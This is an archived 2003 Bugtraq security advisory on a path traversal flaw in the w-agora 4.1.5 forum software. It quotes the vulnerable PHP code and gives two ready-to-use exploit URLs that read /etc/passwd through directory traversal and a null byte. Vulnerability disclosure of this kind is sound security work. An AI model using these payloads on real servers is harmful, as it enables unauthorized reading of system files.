[28427] in bugtraq
Bug in w-agora
daemon@ATHENA.MIT.EDU (sonyy@2vias.com.ar)
Wed Jan 15 13:47:42 2003
Message-ID: <3E1695D2000002B0@mail.2vias.com.ar>
Date: Sun, 12 Jan 2003 12:03:12 -0300
From: sonyy@2vias.com.ar
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset="ISO-8859-1"
Content-Transfer-Encoding: 8bit
=======================
==Shell Security Team==
=======================
==============================
====Advisory For W-agora======
==============================
- Product : w-agora
- Tested version : version 4.1.5
- Website : http://www.w-agora.net
- Discovery By Sonyy
- Vendor Status: informed
- Problem : A security vulnerability in W-agora
The bug :
==========
index.php
if (empty($bn)) {
# No forum selected -> default to 'site' configuration
$site = empty($site) ? "agora" : $site;
$cfg_file = "${cfg_dir}/site_${site}.${ext}";
$expnd = "all";
} else {
$cfg_file = "${cfg_dir}/${bn}.${ext}";
}
Exploit :
=========
index.php
http://www.w-agora.net/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
And modules.php
http://www.w-agora.net/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1
Any Question :
==============
Sonyy --> Sonico60@hotmail.com
